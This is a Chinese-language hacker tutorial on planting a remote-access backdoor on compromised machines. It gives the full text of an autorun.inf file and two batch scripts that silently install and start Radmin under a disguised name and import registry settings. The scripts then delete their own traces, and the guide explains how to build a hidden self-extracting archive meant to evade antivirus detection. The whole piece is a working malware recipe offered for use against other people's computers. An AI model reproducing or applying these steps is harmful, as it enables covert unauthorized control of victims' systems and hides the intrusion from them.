黑客绝技入侵网站全自动安装后门分析

　　1.autorun.inf 2.shell.bat 3.hao.exe(自解压文件)

　　思路：全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件。

　　第一文件带动运行第二文件。同时第二运行第三

　　运行完可正常进入C盘。不会让人发觉。并且里面所带的批处理，会在最后把所有文件删除。此时，后门却已经装上去了 《此法针对没有权限运行木马的入侵活动》

　　制作：

　　[autorun]

　　open=shell.bat

　　这个是autorun.inf

　　@echo off

　　hao.exe

　　c:\windows\explorer c:\

　　del autorun.inf

　　del rad.exe

　　del shell.bat

　　这个是shell.bat

　　hao.exe 里面包含admdll.dll raddrv.dll admin.reg pchealthy.exe r.bat五个文件《关键所在》

　　r.bat--》批处理做法

　　@echo off

　　@pchealthy.exe /install /silence

　　@regedit /s admin.reg

　　@net start r_server

　　@del admin.reg

　　@del r.bat

　　其他四个就是Radmin的文件。这个大家都会，复制过来就行

　　OK，我们再来看自解压的处理，在解压路径里我们用%systemroot%\system32，就是解压到系统目录里,并且 “解压后运行”填上我们的r.bat文件!!!!!!

　　因为这里的文件比较多，比较隐蔽

　　解压模式我们选 “全部隐藏”，和 “覆盖所有文件”!

　　好了，一个不被杀毒软件所能查杀的好后门程序就成功制作出来了!

　　大家不要放在文件夹里压缩哦，要直接选上admdll.dll raddrv.dll admin.reg pchealthy.exe r.bat五个文件压缩

　　哈哈。。这样就行啦。

　　网站你也可以破《这篇文章总结了一些高手和自己的经验》

　　写的不好别见怪。。。---》菜鸟要是能灵活运用这个也很厉害啦

　　当然这个方法有一些局限性